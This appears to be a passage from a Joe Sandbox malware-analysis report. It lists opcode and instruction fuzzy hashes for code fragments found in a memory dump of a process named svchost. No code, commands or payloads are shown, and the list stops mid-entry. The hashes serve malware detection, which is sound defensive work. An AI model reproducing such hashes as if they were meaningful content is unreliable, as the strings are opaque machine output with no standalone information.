                                          • Instruction ID: f31aa4fac2b259c1e62ec93dcf1578a7dc8e7ab6166ef008b628589629761313
                                          • Opcode Fuzzy Hash: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                          • Instruction Fuzzy Hash: 71318A75604206CFC710CF18C580956FBF5FF8D350B2986A9E9989B325EB30ED06CB91
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                          • Instruction ID: caff551f300f700a89024828975f6dd61dadb9ef4dc3b67a18d2c364f0a896f7
                                          • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                          • Instruction Fuzzy Hash: 0321083F601755AACB25EBA58800ABEF7B4EF40610F40801EFDA68B691E634D954C774
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fe2133a2820354d41b1e79edfef5069e8f18e57d8ad8156936cc8a51bce6aa9d
                                          • Instruction ID: c19ae07faeaaa4c241daf3b67227c2f46200cb3c9878d651d0c6d7e2938b0a96
                                          • Opcode Fuzzy Hash: fe2133a2820354d41b1e79edfef5069e8f18e57d8ad8156936cc8a51bce6aa9d
                                          • Instruction Fuzzy Hash: F931E5755003108BDB34FF24C845BA9BBB8AF45314F5882ADD9469F3C1DA749986CBA4
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 12a67896621a3c2b6a5a6a31ab9882f18098fcb939a490ece4fbbd8395b78f8e
                                          • Instruction ID: 132c2408ac0f4465ec540a8d11c6b1ef10cc522ef4f4c2316f79199d36bd1674
                                          • Opcode Fuzzy Hash: 12a67896621a3c2b6a5a6a31ab9882f18098fcb939a490ece4fbbd8395b78f8e
                                          • Instruction Fuzzy Hash: CF313E71A00119EBCB18DBA5D898F9FBBB9FB8D214F454169E905E7241DB30AE04CBA4
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                          • Instruction ID: 45bddeec9d56b6027aad9540e24f39243b4fc3894dd3fbabdcdd04d9166e5cfe
                                          • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                          • Instruction Fuzzy Hash: DB31A935600A14EFDB21DF68C984F6ABBF8EF84354F1545A9E5128B390E730EE02CB60
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5a1488e139124588e49a482fe9cb6ab02ae82e63c10556d035c69d3b1d4d2118
                                          • Instruction ID: bb1f0d6ccf6016fff85e9d0a096afdc314d4fccf84c1a5a266b88627b94534b4
                                          • Opcode Fuzzy Hash: 5a1488e139124588e49a482fe9cb6ab02ae82e63c10556d035c69d3b1d4d2118
                                          • Instruction Fuzzy Hash: E1316D75A00605DFCB14CF1CC984DAEB7B5EF88304B15895AE8059B391E772EE61CF94
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 58dcaef159e4288099b50cfc97d7db574937aeb7fcef4f6eda0e4234b536d67e
                                          • Instruction ID: cfa31418923293abc369ac92ae038b7722c01b57bf94478eae1a415d150f794e
                                          • Opcode Fuzzy Hash: 58dcaef159e4288099b50cfc97d7db574937aeb7fcef4f6eda0e4234b536d67e
                                          • Instruction Fuzzy Hash: 2C21F2392457609FCB61EF04CA58B2ABBA4FF83B10F29486DE9410B751C7B0E854CB91
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2d27681a8c565a9b783fe6ed71702170c09da9cb81127b10cb3d31315d9ddcb6
                                          • Instruction ID: 691291992e3dd7008a497aa4083e01a13afd145ab27b45a863d75e133f53679b
                                          • Opcode Fuzzy Hash: 2d27681a8c565a9b783fe6ed71702170c09da9cb81127b10cb3d31315d9ddcb6
                                          • Instruction Fuzzy Hash: C1218B32614205CFD728CE29D880BAAB7E6EFD4320F998478E915DB2C5DB74F855CB90
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                          • Instruction ID: db17d7b879803c4a79718cb7173ae3a8f87680c043f2676902b0746ffbdeed96
                                          • Opcode Fuzzy Hash: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                          • Instruction Fuzzy Hash: 99217972200700DFD719DF15C545B6ABBE9EF95365F15817DE90A8F3A0EBB0A801CAA8
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c26d4f4ec19aec5025eb50faf0da88b1cb84877905d3e1d85d469d109d1139a3
                                          • Instruction ID: ecba113edbea4c97ffabbc53a7484993dea8aa255be3e438755b1d7d06ca5260
                                          • Opcode Fuzzy Hash: c26d4f4ec19aec5025eb50faf0da88b1cb84877905d3e1d85d469d109d1139a3
                                          • Instruction Fuzzy Hash: 3E21AD75A00229ABCF20DF59C881ABEFBF8FF49740B540069E541AB240D778AD42CFA4
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2b4811e943bdf3fc03344e573d3725470c32d39519d85b88e566411c8c546045
                                          • Instruction ID: 8812e70f154a6ac0dde641ab8ecda89f1512202ac7c2d5cf03842ea5f8320859
                                          • Opcode Fuzzy Hash: 2b4811e943bdf3fc03344e573d3725470c32d39519d85b88e566411c8c546045
                                          • Instruction Fuzzy Hash: 4921AE75A00644AFC715DBA8C940FAABBB8FF48740F140069F944DB7A1D734ED50CBA8
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1f71265f7cde3c099c0f100f119c9e662f656e8535d0d4040279d83c450222d3
                                          • Instruction ID: 7c8507317813c41c3db950788b07291fdcea242b68be1ae0ee61f933e6fead70
                                          • Opcode Fuzzy Hash: 1f71265f7cde3c099c0f100f119c9e662f656e8535d0d4040279d83c450222d3
                                          • Instruction Fuzzy Hash: 6921F330100B01DBEF31EB24CA10B2677E6EB41364F18465AED92CA7A0D731AC62DF55
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b2c6c8be19fbff6f0f592a74bc9b25541a1cdc93e28366fc7ea87ecc3c48f6b9
                                          • Instruction ID: 6aa627503e46fa8fe4d7221dec95c0d75cb66edc1ef9eb722e4fa7233f9b145f
                                          • Opcode Fuzzy Hash: b2c6c8be19fbff6f0f592a74bc9b25541a1cdc93e28366fc7ea87ecc3c48f6b9
                                          • Instruction Fuzzy Hash: AD21B6769043469BC711EF59C948B9BFBECBF81240F08445ABD80CB351D734D989CBA5
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                          • Instruction ID: 832f59bdba189dcd17484622e88c6781ccb14e59f933afa52ac9f30a47815be2
                                          • Opcode Fuzzy Hash: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                          • Instruction Fuzzy Hash: 0321B072644B00ABD311DE1CCC51B5ABBA4EB89720F14052EF9459B7A0D730DD018BA9
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: db6dc73fa20726821c8ef2134f69c9d3cc6227f3587657448270833cb3061308
                                          • Instruction ID: ac33395f31e7ffe21da3d40b559f3aa9079ca44f8bd5e27777a296092684a14d
                                          • Opcode Fuzzy Hash: db6dc73fa20726821c8ef2134f69c9d3cc6227f3587657448270833cb3061308
                                          • Instruction Fuzzy Hash: F521E4612142504FD745CB1AA8B54B7BFE5EFC6125B09C2E6D884CB346C134D907C7B0
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3db66cb10b7f14f713f78c98ff9e49f00b70e694fb2ab8972d13b84e85708b5f
                                          • Instruction ID: 989ad3127142e0e101528bd26d9428647bbc4d35c061c358d762a309f3bbd5e9
                                          • Opcode Fuzzy Hash: 3db66cb10b7f14f713f78c98ff9e49f00b70e694fb2ab8972d13b84e85708b5f
                                          • Instruction Fuzzy Hash: 55217C79600B109FC725DF69CD01B56B7F5AF48744F2884ACA91ADB761E331E842CF98
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 001001e56ffeab1d921d1d8efe76b1c270c0ea4a88fd635c5631c0dc3820c9ee
                                          • Instruction ID: 2f4c86d54758bef1c46dc066bd8b98ca4cdb6b143e332597790a0b65e63621f1
                                          • Opcode Fuzzy Hash: 001001e56ffeab1d921d1d8efe76b1c270c0ea4a88fd635c5631c0dc3820c9ee
                                          • Instruction Fuzzy Hash: B1215776510B10DFC721EF68CA40B19BBB5FF18708F19896DE00A9BAA1C738A810CB48
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c3829acc8dd8b3676ba214999cdeb071b47e9b114fde86ecc43f2e064d4c290b
                                          • Instruction ID: a223ce5161597b3e1ec59c0a2b883564d7f98e1536d1d0f8a7b627b7c9fcebc8
                                          • Opcode Fuzzy Hash: c3829acc8dd8b3676ba214999cdeb071b47e9b114fde86ecc43f2e064d4c290b
                                          • Instruction Fuzzy Hash: AB21B433A104119F9B18CF3DD804466F7E6EFDD31436A827AD512EB269D774BD118A84
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                          • Instruction ID: ccbe6fd37882f8294f07a3dbc90c3d22420ddf116d670c5fac300895bb27ef69
                                          • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                          • Instruction Fuzzy Hash: 1A11EF76600704BFD722DF84CC40FAABBB8EB80794F140039EA008F280D675ED44CB64
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: efde14bc4fe99377bd980469690b7a851cdeb11ddc8672bb2ad8f189927d8fb8
                                          • Instruction ID: 6cecf36673a7f96792fc307693a341d8138d25ee980d569e07167f348217fd91
                                          • Opcode Fuzzy Hash: efde14bc4fe99377bd980469690b7a851cdeb11ddc8672bb2ad8f189927d8fb8
                                          • Instruction Fuzzy Hash: F611BF75701620DBCB11CF59C684AAAB7FAEF4B750B18806DFD08DF305D6B2E9068790
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 387d17f4c7eb774c0096d01f92790b3409a79e69b5eab979495194718c61872f
                                          • Instruction ID: ae06daeba659944d05ae379434195ab82174bac3f1294cc5a6af0ac197641fcb
                                          • Opcode Fuzzy Hash: 387d17f4c7eb774c0096d01f92790b3409a79e69b5eab979495194718c61872f
                                          • Instruction Fuzzy Hash: 1B21C578A002098BE725DF6DD1487EDB7B4EB8A318F2D802CD812573D0CBB89945CB59
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a8fdb770a6444826a418c1e2e3cdf961e2ba64d968b97cf2febae6fdc31b4fed
                                          • Instruction ID: e1d860e05db586eca38e364d5d06ad31f77435a620e2c5024f8cd45ed2d75fec
                                          • Opcode Fuzzy Hash: a8fdb770a6444826a418c1e2e3cdf961e2ba64d968b97cf2febae6fdc31b4fed
                                          • Instruction Fuzzy Hash: BC216D75A00206DFCB14CF98C681AAEBBB5FB89318F24416DE105AB310CB71AD0ACBD0
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 730944cbdf0b446fc85ba6c0f690e15de8c4d08cba9d6a019ce8463eefc694cf
                                          • Instruction ID: 6359178d84a8cb1e3d12b440669b8404d9a508b867f860ea5b129a47c91596bd
                                          • Opcode Fuzzy Hash: 730944cbdf0b446fc85ba6c0f690e15de8c4d08cba9d6a019ce8463eefc694cf
                                          • Instruction Fuzzy Hash: 35218975600B00EFC720DF69D881B66B7E8FF84290F44882DE4AAC7250DA70EC50CBA4
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 74d5e26b06938c8465994b5ddc171734341058e8d770ca7bb2abca1ca3ac58bf
                                          • Instruction ID: 5c123ea6e1197e3a57b8738e3ae147fcff2df3f4bd852b8322accb0dd5c5cfe7
                                          • Opcode Fuzzy Hash: 74d5e26b06938c8465994b5ddc171734341058e8d770ca7bb2abca1ca3ac58bf
                                          • Instruction Fuzzy Hash: 0D11D33E020640ABE734EF65D941B617BA9EBA8780F14812AD8009B354D63CDD01CF69
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 14ee82c43bbb2712d7fb3ea71fa0787250634a69ba520bb0164bc7ca2bff3c7d
                                          • Instruction ID: 3bce0ad1e3279f2673e37aeed7081558088a34cefa272552ba1657d54b9d82bf
                                          • Opcode Fuzzy Hash: 14ee82c43bbb2712d7fb3ea71fa0787250634a69ba520bb0164bc7ca2bff3c7d
                                          • Instruction Fuzzy Hash: 6D2152B1A102059FD754DF2AE884A42BBE5FB5D210B85C5BAE90CDF24AE770D844CB94
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d7234c0e36138c5ee95c7c094e2d0638558b8b7f7ef95b4fbebbe3739b6007be
                                          • Instruction ID: d5757356a5bffc658716f28ebdd33fbff3f2c89d6d47965b3d082659d010ce26
                                          • Opcode Fuzzy Hash: d7234c0e36138c5ee95c7c094e2d0638558b8b7f7ef95b4fbebbe3739b6007be
                                          • Instruction Fuzzy Hash: 9B010476605644ABE716E2AADD54F67AADCEF41394F19047AF8008B240DA24DC05C2B1
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1320547319e34a74ca98e5c9bae704e1e5925d84f5392940f26083fd1c94be86
                                          • Instruction ID: 3df2c6eb176f822cfc44408b93fd60353daf0f9de6807bb961c7602bcfb98ff2
                                          • Opcode Fuzzy Hash: 1320547319e34a74ca98e5c9bae704e1e5925d84f5392940f26083fd1c94be86
                                          • Instruction Fuzzy Hash: 79019676B04740ABD711EBA99C81F6BBAE8DF84614F04043DFA05D7241EA70E9018665
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ab5dca7662d95f66bb5cdf7901944074af6dd6205da9398680eb86638002d29b
                                          • Instruction ID: 79730bb3456e0b63c49aedf218cc671b6a27d2db7463610b0229f11b71cee44d
                                          • Opcode Fuzzy Hash: ab5dca7662d95f66bb5cdf7901944074af6dd6205da9398680eb86638002d29b
                                          • Instruction Fuzzy Hash: CD01A179711209AF9F04DBA6CA48CAFBBBDEFC4A44F050019E911C7200EB30EE05DB60
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e58331a4d015ed5d7a82063b2935f32fb76dad2d2483762225466be67bf97d3a
                                          • Instruction ID: 62a7f2e604b14d8e9628bada4d57fb823135de54d8668689e1f0564d3dc81d94
                                          • Opcode Fuzzy Hash: e58331a4d015ed5d7a82063b2935f32fb76dad2d2483762225466be67bf97d3a
                                          • Instruction Fuzzy Hash: DD11E576A00715ABDB21EF59EA80B5EF7B8EF45790F540059D901EB300D730AD118BA5
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 65dc16eb65316bc33c18d7ac784f712d26694a26981c94ec320b4ab3fb13d482
                                          • Instruction ID: b9dfe25ed5645a178e4454f402c949c7dee7481f14243209b60901f191ec4c23
                                          • Opcode Fuzzy Hash: 65dc16eb65316bc33c18d7ac784f712d26694a26981c94ec320b4ab3fb13d482
                                          • Instruction Fuzzy Hash: 83119E71600B249FD721CF69C941F6B7BE8EB44304F064429E985CB352D735EC018FA5
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 792cbea7a19a7883f77bcaf3e732204a7a35263733305251adaed6bd6a338599
                                          • Instruction ID: d55aea130ea29483b70aeda9da93d70c8542ff0721de9e09cdd2196050b803d9
                                          • Opcode Fuzzy Hash: 792cbea7a19a7883f77bcaf3e732204a7a35263733305251adaed6bd6a338599
                                          • Instruction Fuzzy Hash: 7711CE75A00B48DBD720DF69C984BAEB7A8FF45700F1804BAE901EB341DA79DD01CB94
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
                                          • Instruction ID: c47b38a11b4b2ced49e2f22c6b446dd716dcf662f502622a2781bfc266990c62
                                          • Opcode Fuzzy Hash: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
                                          • Instruction Fuzzy Hash: A401D27A240649BFD711EF26CD90E62F77DFF44795B544929F10046660C721ACA0CAA8
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                          • Instruction ID: d2a69944046b4c13da99ae5e2757955db829190e673c313676727ad58ca38b17
                                          • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                          • Instruction Fuzzy Hash: 5E01D671506B219BCB30CF95D940A36BFA9EF4576070A8A6DFC958B680DB31D821CF68
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0d1dfef05b5e5671058fd236a2123eaa2796aef3a660cce4f89e7479de47974a
                                          • Instruction ID: 3ba358f9c6cbcc446a2efba3180ffbbe174ef7bf72d7a811d78cc2bf68621afa
                                          • Opcode Fuzzy Hash: 0d1dfef05b5e5671058fd236a2123eaa2796aef3a660cce4f89e7479de47974a
                                          • Instruction Fuzzy Hash: 13117074541318ABDB25EB64CD51FE9B378EF04714F5045D9A314AA1E0DB709E91CF88
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f1e09af32990e6be43dc215d65125846c9d267e3be81c5c6b46d3d229d77fa55
                                          • Instruction ID: ade2dac80f6f7fb44341037e397f779a75a98271d92ee7d2c7d78ac660f4ffd9
                                          • Opcode Fuzzy Hash: f1e09af32990e6be43dc215d65125846c9d267e3be81c5c6b46d3d229d77fa55
                                          • Instruction Fuzzy Hash: 92118B36641740EFCB15EF18C980F16BBB8FF48B44F240069E9059F6A1C236ED01CAA4
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                          • Instruction ID: ab40db373c732af89c4fb54f4e3d40a8321ec40f316175d99be1678828b75fbb
                                          • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                          • Instruction Fuzzy Hash: 640124366002108BDF10EA29D990BE6B76ABFCA700F1949A9ED018F345EB71D881C7A0
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                          • Instruction ID: 292d84985a1ea3a99ed9d95cc4ebb95b8ef9e3f8a07c73df9728dc6de76e6b82
                                          • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                          • Instruction Fuzzy Hash: 93012832100B449FDB22E766C900EABB7EDFFC4254F09451EA9468B680DE71E402CB61
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d9ca2c8fef75fbfe160ed619a0a8349c6392c8bfa66e07faea3c5be0e23179cc
                                          • Instruction ID: c88ad64898c5cc1771e5e4fe16d1f038eb2dd18c91a077b61eeab28567a77b42
